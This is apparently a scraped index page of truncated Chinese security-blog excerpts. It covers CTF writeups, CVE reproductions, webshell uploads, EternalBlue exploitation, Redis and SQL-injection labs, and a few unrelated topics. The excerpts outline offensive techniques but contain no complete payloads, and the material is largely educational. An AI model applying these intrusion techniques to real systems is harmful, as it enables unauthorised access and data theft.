知识改变命运，技术就是要分享，有问题随时联系，免费答疑，欢迎联系！ •以有线电缆或光纤作为传输介质的有线局域网应用广泛，但有线传输介质的铺设成本高，位置固定，移动性差。随着人们对…

[LitCTF 2023]Follow me and hack me

[LitCTF 2023]Follow me and hack me wp GET & POST 传参这里用 HackBar ，GET 传参 CTFLit2023 ，POST 传参 Challengeim_c0m1ng ，拿到 flag ： 提示说备份文件还有好吃的，那么我们就来获取一下备份文件。获取备…

HackTheBox - Medium - Linux - Encoding

Encoding 前言经过10个月左右的网安自学，我想说的第一句话无疑是：感谢TryHackMe。当然，后续的HackTheBox&学院、CRTO等等，对我的帮助都很大。许多师傅们都在年度总结，我也看了大家都收获很多，都很…

【漏洞复现】冰峰VPN存在敏感信息泄露漏洞

漏洞描述冰峰VPN log/system.log模块日志信息泄露漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利…

[UUCTF 2022 新生赛]ez_rce

[UUCTF 2022 新生赛]ez_rce wp 在做这道题时，我参考了这篇博客： https://www.cnblogs.com/bkofyZ/p/17594549.html 认识到了自己的一些不足。题目代码如下： <?php ## 放弃把，小伙子，你真的不会RCE,何必在此纠…

【网络技术】【Kali Linux】Wireshark嗅探（五）文件传输协议（FTP）

一、实验目的本次实验使用Wireshark流量分析工具进行网络嗅探，旨在了解文件传输协议（FTP）的工作原理。二、FTP协议概述文件传输协议（File Transfer Protocol）是互联网上使用得最广泛的文件传输协议，用…

网络安全—模拟ARP欺骗

文章目录网络拓扑安装使用编辑数据包客户机攻击机验证仅做实验用途，禁止做违法犯罪的事情，后果自负。当然现在的计算机多无法被欺骗了，开了防火墙ARP欺骗根本无效。网络拓扑均使用Windows Server 2003系统相关配置可以点击观看这篇文章…

网络安全（黑客技术）-2024最新自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对…

问答：攻击面发现及管理

Q1: 长亭云图极速版（Cloud Atlas）是什么？ A1: 它是长亭科技推出的一款攻击面管理运营平台，目的是将企业的网络安全从被动防御转变为主动出击，提前于攻击者采取措施。 Q2: 长亭云图极速版的主要功能包括哪些&#xff…

网络安全全栈培训笔记（52-WEB攻防-通用漏洞弱口令安全社工字典生成服务协议web应用）

第52天 WEB攻防-通用漏洞&弱口令安全&社工字典生成&服务协议&web应用知识点： 1、弱口令安全&配置&初始化等 2、弱口令对象&Web&服务&应用等 3、弱口令字典&查询&列表&列表等 #前置知识： 弱口令(weak…

【期末考试】网络综合复习宝典

相关链接网络复习思维导图（HCIP）https://www.edrawsoft.cn/viewer/public/s/038e2370897928 详述循环冗余校验CRC码https://blog.csdn.net/liht_1634/article/details/124328005?app_version6.2.6&codeapp_1562916241&csdn_share_tail%7B%22…

【复现】Spider-Flow RCE漏洞(CVE-2024-0195)_16

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述 Spider Flow 是一个高度灵活可配置的爬虫平台，用户无需编写代码，以流程图的方式，即可实现爬虫…

网络安全B模块（笔记详解）- 隐藏信息探索

隐藏信息探索 1.访问服务器的FTP服务，下载图片QR，从图片中获取flag，并将flag提交；通过windows电脑自带的图片编辑工具画图将打乱的二维码分割成四个部分，然后将四个部分通过旋转、移动拼接成正确的二维码使用二维码扫描工具CQR.exe扫描该二维码获得一串…

网站后台拿Webshell

通过注入或者其他途径，获取网站管理员账号和密码后，找到后台登录地址，登录后，寻找后台漏洞上传网页后门，获取网站的webshell webshell的作用是方便攻击者，webshel是拥有fso权限，根据fso权限的不…

二十几种未授权访问漏洞合集

未授权访问漏洞是一个在企业内部非常常见的问题，这种问题通常都是由于安全配置不当、认证页面存在缺陷，或者压根就没有认证导致的。当某企业对外的服务端口、功能无限制开放，并且对用户的访问没有做任何限制的时候，可能会泄露出某…

XCTF：stage1[WriteUP]

从题目中下载到图片： 考虑图片是png，隐写方式有可能是高宽修改，也可能是色相隐藏，色彩通道位隐藏等等使用stegsolve对图片进行一下伽马、颜色转换在图片的左上角就显示出了一个二维码使用QR_Rresearch工具对二维码扫描获得一…

网络安全技术新手入门：利用永恒之蓝获取靶机控制权限

目录前言一、搜索永恒之蓝可用模块二、使用攻击模块三、配置攻击模块四、攻击五、总结前言相关法律声明：《中华人民共和国网络安全法》第二十七条任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动&…

银行网络安全体系发展及趋势思考

文章目录前言一、银行网络安全工作面临的主要挑战（一）国际局势愈发复杂，银行面临严峻的外部网络安全威胁（二）关键信息基础设施强监管时代，银行面临更高网络安全监管要求（三）银行数字…

安全漏洞周报（2024.01.01-2023.01.08）

漏洞速览 ■ 用友CRM系统存在逻辑漏洞漏洞详情 1. 用友CRM系统存在逻辑漏洞漏洞介绍： 某友CRM系统是一款综合性的客户关系管理软件，旨在帮助企业建立和维护与客户之间的良好关系。它提供了全面的功能，包括销售管理、市场营销、客户服…

云防护概念及云防护作用

云防护是什么云防护是一种网络安全技术，旨在保护云计算环境中的数据和系统免受恶意攻击和未授权访问。云防护适用场景一切http.https.tcp协议，如游戏、电商、金融、物联网等APP PC 网站。云防护的主要作用云防护的主要作用是通过搭规模庞大的云防…

小H靶场笔记：Empire-Breakout

Empire：Breakout January 11, 2024 11:54 AM Tags：brainfuck编码；tar解压变更目录权限；Webmin；Usermin Owner：只惠摸鱼信息收集使用arp-scan和namp扫描C段存活主机，探测靶机ip：1…

Linux/Networked

Enumeration nmap 网站更新之后有了一个引导模式，更利于学习了，之前看ippsec的视频，要不总是没有思路，现在出现的问题多了提示也更多了，还没有使用，一会用用再说首先，第一个问题是“目标上正…

RPCMS跨站脚本漏洞(xss)

CNVD-ID: CNVD-2024-01190 漏洞描述: RPCMS是一个应用软件，一个网站CMS系统。 RPCMS v3.5.5版本存在跨站脚本漏洞，该漏洞源于组件/logs/dopost.html中对用户提供的数据缺乏有效过滤与转义，攻击者可利用该漏洞通过注入精心设计的有效载荷执行…

使用WAF防御网络上的隐蔽威胁之CSRF攻击

在网络安全领域，除了常见的XSS（跨站脚本）攻击外，CSRF（跨站请求伪造）攻击也是一种常见且危险的威胁。这种攻击利用用户已经验证的身份在没有用户知情的情况下，执行非授权的操作。了解CSRF攻击的机…

数字战场上的坚固屏障：雷池社区版（WAF）

黑客的挑战智能语义分析算法： 黑客们常利用复杂技术进行攻击，但雷池社区版的智能语义分析算法能深入解析攻击本质，即使是最复杂的攻击手法也难以逃脱。 0day攻击防御： 传统防火墙难以防御未知攻击，但雷池社区版能有效…

常见框架漏洞

1.什么是框架 Web框架(Web framework)或者叫做Web应用框架(Web application framework)，是用于进行Web开发的一套软件架构。大多数的Web框架提供了一套开发和部署网站的方式。为Web的行为提供了一套支持的方法。使用Web框架，很多的业务逻辑外的功能不需…

网络安全（黑客）—2024秩序

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对…

网络安全 | 苹果承认 GPU 安全漏洞存在，iPhone 12、M2 MacBook Air 等受影响

1 月 17 日消息，苹果公司确认了近期出现的有关 Apple GPU 存在安全漏洞的报告，并承认 iPhone 12 和 M2 MacBook Air 受影响。该漏洞可能使攻击者窃取由芯片处理的数据，包括与 ChatGPT 的对话内容等隐私信息。安全研究人员发现，…

SSL证书自动化管理有什么好处？如何实现SSL证书自动化？

SSL证书是用于加密网站与用户之间传输数据的关键元素，在维护网络安全方面，管理SSL证书与部署SSL证书一样重要。定期更新、监测和更换SSL证书，可以确保网站的安全性和合规性。而自动化管理可以为此节省时间，并避免人为错误和不必要…

2023年医疗信息化相关法规政策（下）

文章目录前言（23）关于做好2023年基本公共卫生服务工作的通知（国卫基层发〔2023〕20号）（24）关于开展第三批安宁疗护试点工作的通知（国卫办老龄函〔2023〕128号）（25）关于发布《卫生健康信息数据元标准化规则》等4项推荐性卫生行业标准的通告（国卫通〔2023〕6号）（26…

DOM 型 XSS 攻击演示（附链接）

一、介绍 DOM（Document Object Model）型 XSS（Cross-Site Scripting）攻击是一种 Web 应用程序中的安全漏洞，其特点是攻击者成功地注入了恶意脚本，这些脚本在用户的浏览器中执行，从而导致恶意行为…

【kali后续配置】Kali Linux 换源更新及配置SSH服务一文通（一键换源脚本）

在前面，我们已经下载并安装了Kali Linux 2023版本，因为一些事情的耽误，后面的一些操作教程没有发出来，今天给大家补上。 Kali Linux安装前置准备： VMware安装kali Linux 镜像下载 kali源官方源 deb http://htt…

详解矩阵的三角分解A=LU

目录一. 求解Axb 二. 上三角矩阵分解三. 下三角矩阵分解四. 矩阵的三角分解举例1：矩阵三角分解举例2：三角分解的限制举例3：主元和乘法因子均为1 举例4：U为单位阵小结一. 求解Axb 我们知道高斯消元法可以对应矩阵…

Web 安全之点击劫持（Clickjacking）攻击详解

目录什么是点击劫持攻击？ 点击劫持攻击的原理点击劫持攻击的危害点击劫持攻击防范措施小结在当今数字化时代，网络安全问题日益凸显，各种网络攻击手段层出不穷。点击劫持（Clickjacking）攻击作为一种常见的网络…

编译安装Nginx和使用五种算法实现Nginx反向代理负载均衡

目录 Ubuntu中安装Nginx 概念介绍负载均衡几种负载均衡算法反向代理环境规划配置反向代理加权负载均衡（Weighted Load Balancing） 轮询（Round Robin） IP 哈希（IP Hash） 最少连接&#xff…

AES 加解密python实现

1. 要求编程实现AES-128的加解密算法，满足给定明文和密钥加密得到密文，给定密文和密钥解密得到明文，最终用界面化的形式呈现。 2. 算法流程程序主要分为加密与解密两个大模块。在加密模块中包括四个小模块，分别为轮密钥加、字…

关于监控的那些事，你有必要了解一下

监控在整个运维和产品生命周期中扮演着至关重要的角色。其目标是在应用的各个阶段，从程序设计、开发、部署到下线，实现事前预警、事中问题定位和事后问题分析的全方位服务。一、监控的目的监控贯穿应用的整个生命周期，服务对象主要包括技…

能替代微软AD的国产化方案，搭建自主可控的身份管理体系

随着国产化替代步伐加速，以及企业出于信息安全建设的需要，越来越多的企业和组织开始考虑将现有的微软 Active Directory（AD）替换为国产化的LDAP身份目录服务（也称统一身份认证和管理）系统。本文将介绍一种国…

如何使用 Google 搜索引擎保姆级教程（附链接）

一、介绍 "Google语法"通常是指在 Google 搜索引擎中使用一系列特定的搜索语法和操作符来精确地定义搜索查询。这些语法和操作符允许用户过滤和调整搜索结果，提高搜索的准确性。二、安装 Google 下载 Google 浏览器 Google 官网https://www.google.c…

[NCTF2019]Fake XML cookbook(特详解)

先试了一下弱口令，哈哈习惯了查看页面源码发现xml function doLogin(){var username $("#username").val();var password $("#password").val();if(username "" || password ""){alert("Please enter the usern…

获取真实 IP 地址（一）：判断是否使用 CDN（附链接）

一、介绍 CDN，全称为内容分发网络（Content Delivery Network），是一种网络架构，旨在提高用户对于网络上内容的访问速度和性能。CDN通过在全球各地部署分布式服务器节点来存储和分发静态和动态内容，从而减少…

获取真实 IP 地址（二）：绕过 CDN（附链接）

一、DNS历史解析记录 DNS 历史解析记录指的是一个域名在过去的某个时间点上的DNS解析信息记录。这些记录包含了该域名过去使用的IP地址、MX记录（邮件服务器）、CNAME记录（别名记录）等 DNS 信息。DNS 历史记录对于网络管理员、安全研…

某观鸟平台逆向分析

声明：由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！ 1.抓包: 发现url：https://api.xxxxxxx.cn/…

[SWPUCTF 2021 新生赛]include

他让我们传入一个flag值我们传入即可看到代码部分传入一个php的伪类即可得到经过Base64加密的flag，解密即可

Akamai 如何揪出微软 RPC 服务中的漏洞

近日，Akamai研究人员在微软Windows RPC服务中发现了两个重要漏洞：严重程度分值为4.3的CVE-2022-38034，以及分值为8.8的CVE-2022-38045。这些漏洞可以利用设计上的瑕疵，通过缓存机制绕过MS-RPC安全回调。我们已经确认，所…

云计算运营模式介绍

目录一、云计算运营模式概述 1.1 概述二、云计算服务角色 2.1 角色划分 2.1.1 云服务提供商 2.1.2 云服务消费者 2.1.3 云服务代理商 2.1.4 云计算审计员 2.1.5 云服务承运商三、云计算责任模型 3.1 云计算服务模式与责任关系图 3.2 云计算服务模式与责任关系解析…

《Python 网络爬虫简易速速上手小册》第6章：Python 爬虫的优化策略（2024 最新版）

文章目录 6.1 提高爬虫的效率6.1.1 重点基础知识讲解6.1.2 重点案例：使用 asyncio 和 aiohttp 实现异步爬虫6.1.3 拓展案例 1：利用 Scrapy 的并发特性6.1.4 拓展案例 2：使用缓存来避免重复请求 6.2 处理大规模数据爬取6.2.1 重点基础知识讲解…

网络安全保险发展起始阶段的挑战及应对措施

文章目录前言一、网络安全保险的有序发展二、当前我国网络安全保险发展的初期态势（一）网络安全风险类型（二）网络安全保险的作用（三）与外国网络安全保费的规模对比三、我国网络安全保险发展初期面临的挑战…

域环境权限提升

Windows系统配置错误在Windows系统中，攻击者通常会通过系统内核溢出漏来提权，但是如果碰到无法通过系统内核溢出漏洞法国提取所在服务器权限的情况，就会系统中的配置错误来提权。Windows系统中常见哦欸之错误包括管理员凭证配置错误&#x…

黑客技术（网络安全）自学2024

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

谷歌警告 Chrome 浏览器零日漏洞CVE-2024-0519被利用

谷歌推出了紧急 Chrome 浏览器更新，以修复三个高严重性安全缺陷，并警告其中一个错误已被广泛利用。被利用的零日漏洞被标记为CVE-2024-0519，被描述为 V8 JavaScript 引擎中的越界内存访问问题。按照惯例，谷歌没有提供有关所观…

好用的网站性能监测与服务可用性监测工具盘点

盘点市面上常见好用的网站性能监测与服务可用性监测工具，以下工具各有所长，有需求自取。网站性能检测 1. 百川云由长亭科技提供，一家专注于网安的实力厂商。百川云网站监测：长亭科技自研的网站稳定性、安全性监控 saas 应用工…

gost 多级代理

对gost（https://github.com/ginuerzh/gost）做多级代理的一些场景进行总结。 1.常规开放HTTP/SOCKS5代理作为标准HTTP/SOCKS5代理 gost -L:8080 设置代理认证信息 gost -Ladmin:123456localhost:8080 多端口监听 gost -Lhttp2://:443 -Lsocks5://:…

红队视角下的AWS横向移动

0x01 前言本文主要从红队视角讲述AWS公有云中的一些横向移动思路以及对应的一些身份和权限基础。概括一下AWS横向移动思路：在获得一个凭据（AK、SK等）的前提下，枚举所有可访问资源，再通过可控制资源获得更多的凭据&…

sqlilabs第五十一五十二关

Less-51(GET - Error based - ORDER BY CLAUSE-String- Stacked injection) 手工注入源码单引号闭合用注释(没有后续输出只能堆叠注入) 自动注入和上一关一样 Less-52(GET - Bind based - ORDER BY CLAUSE-numeric- Stacked injection) 手工注入数字类型不用注释直接…

使用WAF防御网络上的隐蔽威胁之扫描器

在网络安全领域，扫描器是用于侦察和识别网络系统漏洞的工具。它们可以帮助网络管理员识别安全漏洞，也可能被攻击者用来寻找攻击目标。扫描器的基本概念定义：扫描器是一种自动化工具，用于探测网络和服务器中的漏洞、开放端口、…

[NSSRound#16 Basic]RCE但是没有完全RCE

题目代码： <?php error_reporting(0); highlight_file(__file__); include(level2.php); if (isset($_GET[md5_1]) && isset($_GET[md5_2])) {if ((string)$_GET[md5_1] ! (string)$_GET[md5_2] && md5($_GET[md5_1]) md5($_GET[md5_2])) {i…

rust跟我学六:虚拟机检测

图为RUST吉祥物大家好，我是get_local_info作者带剑书生，这里用一篇文章讲解get_local_info是怎么检测是否在虚拟机里运行的。首先，先要了解get_local_info是什么？ get_local_info是一个获取linux系统信息的rust三方库，并提供一些常用功能，目前版本0.2.4。详细介绍地址：…

[通知]rust跟我学八:获取指定目录下的所有文件全路径已上线

大家好，我是带剑书生，开源库get_local_info的作者。目前我的付费专栏已经上线，用于介绍在实现get_local_info过程中，遇到该问题所使用的解决方法，喜欢的朋友可以去订阅了，19.9元，非常便宜的价格…

【现代密码学基础】详解完美安全与不可区分安全

目录一. 介绍二. 不可区分性试验三. 不可区分性与完美安全四. 例题五. 小结一. 介绍敌手完美不可区分，英文写做perfect adversarial indistinguishability，其中adversarial经常被省略不写，在密码学的论文中经常被简称为IND安全。…

SPN 泄露 | 扫描 | 维护

SPN 泄露当Service Principal Names（SPNs）泄露时，可能会引发严重的安全风险，特别是在使用Kerberos身份验证的环境中。身份欺骗（Identity Spoofing）： 攻击者可以用泄露的SPN来伪装成合法的服…

$详解矩阵的LDU分解$

详解矩阵的LDU分解

目录一. 矩阵分解二. 解方程三. 例题说明四. 矩阵的LDU分解五. 矩阵三角分解的唯一性一. 矩阵分解其实我们可以把一个线性系统（Linear System）看成两个三角系统（Triangular Systems），本文章将解释为什么可…

华为三层交换机之基本操作

Telnet简介 Telnet是一个应用层协议,可以在Internet上或局域网上使用。它提供了基于文本的远程终端接口，允许用户在本地计算机上登录到远程计算机，然后像在本地计算机上一样使用远程计算机的资源。Telnet客户端和服务器之间的通信是通过Telnet协议进行的…

ip2domain - 批量查询ip对应域名、备案信息、百度权重

免责声明由于传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢&#xf…

《项目中疑难问题解决》主题征集

大家好，我是get_local_info开源库作者带剑书生，现在我的《Rust跟我学》专栏文章已全部上线。新的付费专栏，《项目中疑难问题解决》已经在路上了，现征集项目中你遇到的难搞的问题，你的问题交给我来解决。欢迎反馈您在项…

网络安全B模块（笔记详解）- SQL注入

简单sql注入 1.使用渗透机场景kali中工具扫描服务器场景，将apache的端口号和版本号作为Flag提交（格式：端口号_版本号） Flag：8081_7.5 2.使用渗透机场景windows7访问服务器场景SQL网站，并将网站中概述页面中的Flag提交； Flag：sql_is_good 3.使用渗透机场景windows7访问…

redis未授权访问全漏洞复现

redis未授权访问全漏洞复现 Redis 有关的漏洞具有明显的时间分段性，在15年11月之前，主要是未授权导致的数据泄露，获得一些账号密码。另外还可以 DoS（参考：Sangfor VMP redis unauthorized access vulnerability&#…

sqlilabs第五十七五十八关

Less-57(GET - challenge - Union- 14 queries allowed -Variation 4) 手工注入 Less-58(GET - challenge - Double Query- 5 queries allowed -Variation 1) 手工注入报错注入就可以（布尔注入的话次数不够）(所以我们前面需要做够足够的数据支持) 最后…

虹科分享 | 汽车技术的未来：Netropy如何测试和确保汽车以太网的性能

文章速览： 什么是汽车以太网？汽车以太网的用途是什么？汽车以太网的测试要求是什么？流量生成如何帮助测试汽车以太网？ 如今汽车不再是单纯的代步工具，把人从A点带到B点，同时还配备了车载信息娱乐…

DC-3靶机刷题记录

靶机下载地址： 链接：https://pan.baidu.com/s/1-P5ezyt5hUbmmGMP4EI7kw?pwdrt2c 提取码：rt2c 参考： http://t.csdnimg.cn/hhPi8https://www.vulnhub.com/entry/dc-32,312/ 官网http://t.csdnimg.cn/5mVZ7DC-3 (1).pdfhttps://…

使用docker安装使用AWVS渗透常用工具

AWVS安装 AWVS我是装在Docker上的，在VPS中部署好Docker后，敲入以下命令 docker pull secfa/docker-awvs #拉取镜像 docker run -it -d -p 8443:3443 secfa/docker-awvs #将Docker的3443端口映射到VPS的8443端口访问https://VPS的IP:8443 默认账号密码&…

保姆级最新版Kali虚拟机安装和汉化中文教程

Kali虚拟机简介 Kali虚拟机是一款基于Debian的Linux发行版虚拟机操作系统，专为安全渗透测试和数字取证而设计。该虚拟机预装了许多渗透测试软件，包括Metasploit、BurpSuite、sqlmap、nmap以及Cobalt Strike等，这些工具都是为了进行网络安全测…

【建议收藏】零基础入门|2024最全的白帽黑客学习教程，从0到黑客高手！

新手如何通过自学黑客技术成为厉害的白帽黑客？ 我目前虽然算不上顶尖的白帽大佬，但自己在补天挖漏洞也能搞个1万多块钱。给大家分享一下我的学习方法，0基础也能上手学习,如果你能坚持学完，你也能成为厉害的白帽子！ …

网络安全B模块（笔记详解）- 判断操作系统及应用程序渗透测试

1.使用渗透机场景BT5中的渗透测试工具对服务器场景WebServ2003进行ping扫描渗透测试（使用工具Nmap，使用参数v；n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交； 2.使用渗透机场景BT5中的渗透测试工具对服务器场景WebServ2003进行ping扫描渗…

vulnhub靶机HotelWW

下载地址：https://download.vulnhub.com/worstwesternhotel/HotelWW.ova 主机发现目标142 端口扫描服务版本扫描漏洞扫描看一下web 好好好这么玩改host 啥也没有先做个目录爆破扫描太慢我就没看了看几个重点的txt（robot,config，readme&…

网络安全（黑客）—2024学习

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对…

SQL 注入漏洞原理以及修复方法

漏洞名称 ：SQL注入、SQL盲注漏洞描述：所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将&…

网络安全小白进阶试题——附答案

选择题（每题1分，共20分） 攻击者通过发送大量伪造的网络数据包，使目标网络资源不可用的攻击类型是？ A) PhishingB) DDoSC) SpoofingD) Malware 下列哪项是一种常见的社交工程攻击？ A) Firewall bypassB) Bru…

【复现】奥威亚视屏云平台文件读取漏洞_27

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述奥威亚视屏云平台拥有丰富的应用模块，包括结对帮扶、网络教研、教研共同体、优课汇聚、教学资源、在线巡课、AI课堂分…

sqlmap使用教程（3）-探测注入漏洞

1、探测GET参数以下为探测DVWA靶场low级别的sql注入，以下提交方式为GET，问号（?）将分隔URL和传输的数据，而参数之间以&相连。--auth-credadmin:password --auth-typebasic （DVWA靶场需要登录&#xf…

Atlassian Confluence存在远程代码执行漏洞（CVE-2023-22527）附POC软件

@[toc] Atlassian Confluence存在远程代码执行漏洞（CVE-2023-22527）附POC软件免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关…

【黑客攻击】微软遭受由APT组织 Midnight Blizzard发起的网络攻击

隐藏的威胁和网络巨头的反应。周五，微软宣布了一次网络攻击，据信是由APT组织 Midnight Blizzard发起的，此次攻击渗透了该公司的多个公司电子邮件帐户，包括“负责网络安全、法律和其他职能的高级管理层和员工”的电子邮件帐户。 …

＜网络安全＞《4 网络安全产品之web应用防护系统》

1 基本概念 1.1 WAF Web应用防护系统（也称为：网站应用级入侵防御系统。英文：Web Application Firewall，简称：WAF）。一般作为网关设备，防护Web、Webmail服务器等。 1.2 本质 WAF的本质是Web应…

三、安全工程—密码学（CISSP）

目录一、密码学术语二、密码学历史三、密码系统 1.对称密码技术

3.php开发-个人博客项目输入输出类留言板访问IPUA头来源

目录知识点 : 输入输出配置环境时： 搜索框： 留言板： 留言板的显示（html）： php代码显示提交的留言： 写入数据库对留言内容进行显示： php全局变量-$_SERVER 检测来源墨…

【重点问题】攻击面发现及管理

Q1：在使用长亭云图极速版时，是否需要增设白名单扫描节点？ 长亭云图极速版高级网络安全产品基于一种理念，即攻击面发现是一个不断变换且需要持续对抗的过程。在理想的情况下，用户应当在所有预置防护设施发挥作用的环境…

burp靶场--WebSockets安全漏洞

burp靶场–WebSockets安全漏洞 https://portswigger.net/web-security/websockets/what-are-websockets ### 什么是 WebSocket？ WebSocket是一种通过 HTTP 发起的双向、全双工通信协议。它们通常在现代 Web 应用程序中用于流数据和其他异步流量。在本节中&#x…

PWN入门Protostar靶场Stack系列

Protostar靶场地址 https://exploit.education/protostar/溢出源码分析 #include <stdlib.h> #include <unistd.h> #include <stdio.h>int main(int argc, char **argv) {volatile int modified; //定义一个变量char buffer[64]; //给…

智能基础设施2024年发展趋势

文章目录前言一、智能基础设施的构建模块（一）传感器（二）图像捕捉（三）无线通信（四）高级2D和3D（五）BIM：模型、建模和管理（六）实景捕捉和绘图（七）GIS和位置智能二、智能基础设施的影响（一）提高效率（二）提高安全性（三）环境效益（四）数据决策（五）节约成本（…

服务器运维小技巧（二）——如何进行监控告警

服务器运维难度高的原因，很大程度是因为服务器一旦出现问题，生产环境的业务就会受到严重影响，极有可能带来难以承担的后果。因此这份工作要求工程师保持高要求的服务质量，能够快速响应问题，及时解决问题。但是“及时…

网络安全产品之认识漏洞扫描设备

文章目录一、什么是漏洞扫描设备二、漏洞扫描设备的主要功能三、漏洞扫描设备的主要技术四、漏洞扫描设备的主要类型五、漏洞扫描设备的使用方式六、漏洞扫描设备如何与其他安全设备联动七、漏洞扫描设备的应用场景漏洞是指在硬件、软件、协议的具体实现或系统安全策略上存在…

CTFSHOW ——misc

misc1 图片就是答案 ctfshow{22f1fb91fc4169f1c9411ce632a0ed8d} misc2 打开就是png文件，更改一下后缀跟着学了下pythyon图片提取 import pytesseract from PIL import Image# 使用绝对路径打开图片文件 img Image.open(D:\\CTF\\题目\\NSSCTF\\misc2\\misc2.…

xss靶场实战

靶场链接：https://pan.baidu.com/s/1ors60QJujcmIZPf3iU3SmA?pwd4mg4 提取码：4mg4 XSS漏洞原理 XSS又叫CSS（Cross Site Script），跨站脚本攻击。因为与html中的css样式同，所以称之为XSS。在OWASP top 1…

CVE-2019-0708 BlueKeep远程桌面代码执行漏洞靶机复现

一、靶机环境搭建本次复现的靶机环境为 Windows 7 SP1的旗舰版靶机下载： 链接: https://pan.baidu.com/s/14aSIZgOebdLmeI2l9lGx_w 提取码: bw7m 二、靶机配置导入ISO文件光盘镜像文件升级一下系统版本输入序列号： 6K2KY-BFH24-PJW6W-9GK29-TM…

由《幻兽帕鲁》私服漏洞引发的攻击面思考

《幻兽帕鲁》私服意外丢档当了一天的帕鲁，回家开机抓帕鲁的时候发现服务器无法连接。运维工具看了下系统负载发现 CPU 已经跑满。故障排查登录服务器进行排查发现存在可疑的 docker 进程。经过一番艰苦的溯源，终于在命令行历史中发现了端倪攻击…

BUUCTF-Real-[ThinkPHP]5-Rce

1、ThinkPHP检测工具 https://github.com/anx0ing/thinkphp_scan 漏洞检测通过漏洞检测，我们发现存在rce漏洞！ 2、漏洞利用 ---- [!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution VulnerabilityScript: thinkphp5022_5129.pyUrl: http://n…

网安人必看！CISP家族顶流证书攻略

网络安全已成为当今的热门领域，证书在职业发展中的重要性不言而喻。但是，证书市场五花八门，选择适合自己的证书可是个大问题。别担心，今天我们就来聊聊CISP家族的几个热门认证，让你在网络安全领域的发展更加顺利&#…

网络安全产品之认识防病毒软件

文章目录一、什么是计算机病毒二、什么是防病毒软件三、防病毒软件的作用四、防病毒软件的工作原理五、防病毒软件的核心技术六、防病毒软件的使用方式随着计算机技术的不断发展，防病毒软件已成为企业和个人计算机系统中不可或缺的一部分。防病毒软件是网络安全产…

8、应急响应-战前溯源反制主机蜜罐系统HFishHIDSElkeidWazuh

用途：个人学习笔记，欢迎指正目录背景： 一、潮源反制-平台部署-蜜罐-Hfish 二、溯源反制-平台部署-HIDS-Wazuh 三、溯源反制-平台部署-HlDS-Elkeid-hub 背景： 攻击者对服务器存在着各种威胁行为，作为安全人员&am…

5、应急响应-拒绝服务钓鱼识别DDOS压力测试邮件反制分析应用日志

目录前言： 1、#内网应急-日志分析-爆破&横向&数据库 2、#红队APT-钓鱼邮件识别-内容&发信人&附件 3、#拒绝服务攻击-DDOS&CC-代理&防火墙防御用途：个人学习笔记，欢迎指正！ 前言： 了解和…

收集子域名信息（二）：第三方网站查询

一、介绍通过第三方网站查询子域名信息是指使用外部提供的在线工具或服务，通过输入主域名（主网站的域名）来获取与该主域名相关的子域名列表的过程。子域名是在主域名下创建的附加标识，通常用于将网站内容组织成不同部分或为特定…

防御保护--NAT策略

目录 NAT策略 NAT类型 server-map表 P2P --- peer to peer 网络类型编辑目标NAT--服务器映射双向NAT 编辑多出口NAT NAT策略静态NAT --- 一对一动态NAT --- 多对多 NAPT --- 一对多的NAPT --- easy ip --- 多对多NAPT 服务器映射源NAT--基于源IP地址进行转…

红队渗透靶机:LEMONSQUEEZY: 1

目录信息收集 1、arp 2、nmap 3、nikto 4、whatweb 目录扫描 1、dirsearch 2、gobuster WEB phpmyadmin wordpress wpscan 登录wordpress 登录phpmyadmin 命令执行反弹shell 提权 get user.txt 信息收集本地提权信息收集 1、arp ┌──(root㉿ru)-[~…

今年十八，喜欢SQL注入

#1024程序员节｜用代码，改变世界# 前言 🍀作者简介：被吉师散养、喜欢前端、学过后端、练过CTF、玩过DOS、不喜欢java的不知名学生。 🍁个人主页：被吉师散养的职业混子 🫒每日emo：怀揣…

Python Flask框架-开发简单博客-项目布局、应用设置

作者：Eason_LYC 悲观者预言失败，十言九中。乐观者创造奇迹，一次即可。一个人的价值，只在于他所拥有的。所以可以不学无术，但不能一无所有！ 技术领域：WEB安全、网络攻防关注WEB安全、网络攻防…

信息安全管理与评估 21年国赛真题解析答案（待更新）

DCRS工作任务 DCRS 开启 telnet 登录功能，用户名 dcn01，密码 dcn01，配置使用 telnet 方式登录终端界面前显示如下授权信息： “WARNING!!! Authorised access only, all of your done will be recorded! Disconnected IMMEDIATEL…

网络安全必学SQL注入

